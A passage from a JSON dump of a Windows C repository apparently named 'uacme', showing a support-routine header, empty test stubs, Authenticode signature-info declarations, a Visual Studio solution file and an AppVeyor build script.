    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2021\n*\n*  TITLE:       SUP.H\n*\n*  VERSION:     1.52\n*\n*  DATE:        23 Nov 2021\n*\n*  Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n/*\n* supHeapAlloc\n*\n* Purpose:\n*\n* Wrapper for RtlAllocateHeap.\n*\n*/\nPVOID FORCEINLINE supHeapAlloc(\n    _In_ SIZE_T Size)\n{\n    return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, Size);\n}\n\n/*\n* supHeapFree\n*\n* Purpose:\n*\n* Wrapper for RtlFreeHeap.\n*\n*/\nBOOL FORCEINLINE supHeapFree(\n    _In_ PVOID Memory)\n{\n    return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Memory);\n}\n\nBOOL supIsCorImageFile(\n    _In_ PVOID ImageBase);\n\nLPWSTR supReadKeyString(\n    _In_ HKEY hKey,\n    _In_ LPWSTR KeyValue,\n    _In_ PDWORD pdwDataSize);\n\nPVOID supQueryKeyName(\n    _In_ HKEY hKey,\n    _Out_opt_ PSIZE_T ReturnedLength);\n\nBOOLEAN supIsProcess32bit(\n    _In_ HANDLE hProcess);\n\nPVOID supFindPattern(\n    _In_ CONST PBYTE Buffer,\n    _In_ SIZE_T BufferSize,\n    _In_ CONST PBYTE Pattern,\n    _In_ SIZE_T PatternSize);\n\nLRESULT supRegReadDword(\n    _In_ HKEY hKey,\n    _In_ LPWSTR lpValueName,\n    _In_ LPDWORD Value);\n\nPVOID supLookupImageSectionByName(\n    _In_ CHAR* SectionName,\n    _In_ ULONG SectionNameLength,\n    _In_ PVOID DllBase,\n    _Out_ PULONG SectionSize);\n\nBOOL supConcatenatePaths(\n    _Inout_ LPWSTR Target,\n    _In_ LPCWSTR Path,\n    _In_ SIZE_T TargetBufferSize);\n"
  },
  {
    "path": "Source/Yuubari/tests/test_fusion.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2017\n*\n*  TITLE:       TEST_FUSION.C\n*\n*  VERSION:     1.21\n*\n*  DATE:        03 Mar 2017\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"fusion.h\"\n\nBYTE TestArray[1024 * 32] = { 0 };\n\nVOID TestActivationContext(\n    VOID\n)\n{\n\n}\n"
  },
  {
    "path": "Source/Yuubari/tests/test_fusion.h",
    "content": "#/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2017\n*\n*  TITLE:       TEST_FUSION.H\n*\n*  VERSION:     1.10\n*\n*  DATE:        20 Feb 2017\n*\n*  Test unit header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nVOID TestActivationContext(\n    VOID\n);\n"
  },
  {
    "path": "Source/Yuubari/wintrustex.h",
    "content": "#pragma once\n\n// How the signature is carried: embedded Authenticode or a catalog entry.\ntypedef enum _SIGNATURE_INFO_TYPE {\n    SIT_UNKNOWN = 0x0,\n    SIT_AUTHENTICODE = 0x1,\n    SIT_CATALOG = 0x2\n} SIGNATURE_INFO_TYPE;\n\n// SIF_* flags, passed as the sigInfoFlags parameter of ptrWTGetSignatureInfo.\n#define SIF_AUTHENTICODE_SIGNED 0x1\n#define SIF_CATALOG_SIGNED      0x2\n#define SIF_VERSION_INFO        0x4\n#define SIF_CHECK_OS_BINARY     0x800\n#define SIF_BASE_VERIFICATION   0x1000\n#define SIF_CATALOG_FIRST       0x2000\n#define SIF_MOTW                0x4000\n\n// Verification result, reported in SIGNATURE_INFO.SignatureState.\ntypedef enum _SIGNATURE_STATE {\n    SIGNATURE_STATE_UNSIGNED_MISSING = 0x0,\n    SIGNATURE_STATE_UNSIGNED_UNSUPPORTED = 0x1,\n    SIGNATURE_STATE_UNSIGNED_POLICY = 0x2,\n    SIGNATURE_STATE_INVALID_CORRUPT = 0x3,\n    SIGNATURE_STATE_INVALID_POLICY = 0x4,\n    SIGNATURE_STATE_VALID = 0x5,\n    SIGNATURE_STATE_TRUSTED = 0x6,\n    SIGNATURE_STATE_UNTRUSTED = 0x7,\n} SIGNATURE_STATE;\n\n// Signature details returned through the siginfo parameter of ptrWTGetSignatureInfo.\ntypedef struct _SIGNATURE_INFO {\n    DWORD cbSize;\n    SIGNATURE_STATE SignatureState;\n    SIGNATURE_INFO_TYPE SignatureType;\n    DWORD dwSignatureInfoAvailability;\n    DWORD dwInfoAvailability;\n    PWSTR pszDisplayName;\n    DWORD cchDisplayName;\n    PWSTR pszPublisherName;\n    DWORD cchPublisherName;\n    PWSTR pszMoreInfoURL;\n    DWORD cchMoreInfoURL;\n    LPBYTE prgbHash;\n    DWORD cbHash;\n    BOOL fOSBinary; //True if the item is signed as part of an operating system release\n} SIGNATURE_INFO, *PSIGNATURE_INFO;\n\n// Function pointer type for WTGetSignatureInfo.\ntypedef LONG (WINAPI *ptrWTGetSignatureInfo)(\n    LPWSTR pszFile,\n    HANDLE hFile,\n    ULONG sigInfoFlags, //SIF_*\n    SIGNATURE_INFO *siginfo,\n    VOID *ppCertContext,\n    VOID *phWVTStateData\n);\n"
  },
  {
    "path": "Source/uacme.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.2.32616.157\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Akagi\", \"Akagi\\uacme.vcxproj\", \"{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Fubuki\", \"Fubuki\\dll.vcxproj\", \"{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"shared\", \"shared\", \"{49552A73-F1A4-44FA-94C0-5CDD84F48717}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\consts.h = Shared\\consts.h\n\t\tShared\\libinc.h = Shared\\libinc.h\n\t\tShared\\shared.h = Shared\\shared.h\n\t\tShared\\util.c = Shared\\util.c\n\t\tShared\\util.h = Shared\\util.h\n\t\tShared\\windefend.c = Shared\\windefend.c\n\t\tShared\\windefend.h = Shared\\windefend.h\n\tEndProjectSection\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"NanoDesu\", \"NanoDesu\", \"{04845492-BD9E-4EC6-ACA4-4A0A460B3508}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Naka\", \"Naka\\Naka.vcxproj\", \"{3BEF8A16-981F-4C65-8AE7-C612B46BE446}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Yuubari\", \"Yuubari\\Yuubari.vcxproj\", \"{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"Akatsuki\", \"Akatsuki\\Akatsuki.vcxproj\", \"{07EF7652-1C2D-478B-BB4B-F9560695A387}\"\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"minirtl\", \"minirtl\", \"{45D748AC-9B16-426E-808D-94662B0417F7}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\cmdline.c = Shared\\cmdline.c\n\t\tShared\\minirtl.h = Shared\\minirtl.h\n\t\tShared\\rtltypes.h = Shared\\rtltypes.h\n\t\tShared\\strtoul.c = Shared\\strtoul.c\n\t\tShared\\u64tohex.c = Shared\\u64tohex.c\n\t\tShared\\_filename.c = 
Shared\\_filename.c\n\t\tShared\\_strcat.c = Shared\\_strcat.c\n\t\tShared\\_strcmp.c = Shared\\_strcmp.c\n\t\tShared\\_strcmpi.c = Shared\\_strcmpi.c\n\t\tShared\\_strcpy.c = Shared\\_strcpy.c\n\t\tShared\\_strend.c = Shared\\_strend.c\n\t\tShared\\_strlen.c = Shared\\_strlen.c\n\t\tShared\\_strncmp.c = Shared\\_strncmp.c\n\t\tshared\\_strncmpi.c = shared\\_strncmpi.c\n\t\tShared\\_strncpy.c = Shared\\_strncpy.c\n\t\tShared\\_strstri.c = Shared\\_strstri.c\n\tEndProjectSection\nEndProject\nProject(\"{2150E333-8FDC-42A3-9474-1A3956D46DE8}\") = \"ntos\", \"ntos\", \"{876F1157-B68F-4D0A-B963-6157B266DDE5}\"\n\tProjectSection(SolutionItems) = preProject\n\t\tShared\\ntos\\ntbuilds.h = Shared\\ntos\\ntbuilds.h\n\t\tShared\\ntos\\ntos.h = Shared\\ntos\\ntos.h\n\t\tShared\\ntos\\ntsxs.h = Shared\\ntos\\ntsxs.h\n\tEndProjectSection\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|Win32 = Debug|Win32\n\t\tDebug|x64 = Debug|x64\n\t\tDebugConsole|Win32 = DebugConsole|Win32\n\t\tDebugConsole|x64 = DebugConsole|x64\n\t\tRelease|Win32 = Release|Win32\n\t\tRelease|x64 = Release|x64\n\t\tReleaseInternal|Win32 = ReleaseInternal|Win32\n\t\tReleaseInternal|x64 = ReleaseInternal|x64\n\t\tReleaseInternalConsole|Win32 = ReleaseInternalConsole|Win32\n\t\tReleaseInternalConsole|x64 = ReleaseInternalConsole|x64\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Debug|x64.Build.0 = Debug|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.ActiveCfg = DebugConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|Win32.Build.0 = 
DebugConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.ActiveCfg = DebugConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.DebugConsole|x64.Build.0 = DebugConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|Win32.Build.0 = Release|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.ActiveCfg = Release|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.Release|x64.Build.0 = Release|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|Win32\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternalConsole|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.ActiveCfg = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|Win32.Build.0 = Debug|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.ActiveCfg = 
Release|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|Win32.Build.0 = Release|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.ActiveCfg = Release|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.Release|x64.Build.0 = Release|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.ActiveCfg = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|Win32.Build.0 = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Debug|x64.Build.0 = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.ActiveCfg = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|Win32.Build.0 = Debug|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.ActiveCfg = Release|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|Win32.Build.0 = Release|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.ActiveCfg = Release|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.Release|x64.Build.0 = 
Release|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|Win32\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|Win32.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Debug|x64.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|Win32.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|Win32.ActiveCfg = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.ActiveCfg = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.Release|x64.Build.0 = Release|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.ActiveCfg = 
ReleaseInternalConsole|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{304D5A8A-EF98-4E21-8F4D-91E66E0BECAC}.ReleaseInternalConsole|x64.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|Win32.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Debug|x64.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|Win32.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.ActiveCfg = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.DebugConsole|x64.Build.0 = Debug|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|Win32.ActiveCfg = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.ActiveCfg = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.Release|x64.Build.0 = Release|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|Win32.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternal|x64.Build.0 = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.ActiveCfg = ReleaseInternalConsole|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|Win32.Build.0 = ReleaseInternalConsole|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.ActiveCfg = ReleaseInternal|x64\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387}.ReleaseInternalConsole|x64.Build.0 = 
ReleaseInternal|x64\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(NestedProjects) = preSolution\n\t\t{23A2E629-DC9D-46EA-8B5A-F1D60566EA09} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{3BEF8A16-981F-4C65-8AE7-C612B46BE446} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{07EF7652-1C2D-478B-BB4B-F9560695A387} = {04845492-BD9E-4EC6-ACA4-4A0A460B3508}\n\t\t{45D748AC-9B16-426E-808D-94662B0417F7} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}\n\t\t{876F1157-B68F-4D0A-B963-6157B266DDE5} = {49552A73-F1A4-44FA-94C0-5CDD84F48717}\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {34101EC9-C266-4BF6-AC89-898FF5B54501}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "appveyor.yml",
    "content": "version: 1.0.{build}\nbranches:\n  only:\n  - master\n\nimage: Visual Studio 2022\n\nconfiguration: Release\nplatform: x64\n\nclone_folder: c:\\projects\\uacme\n\nbuild_script:\n  - cmd: msbuild Source\\uacme.sln /m /v:normal /p:Configuration=Release /p:Platform=x64 /p:PlatformToolset=v143\n"
  }
]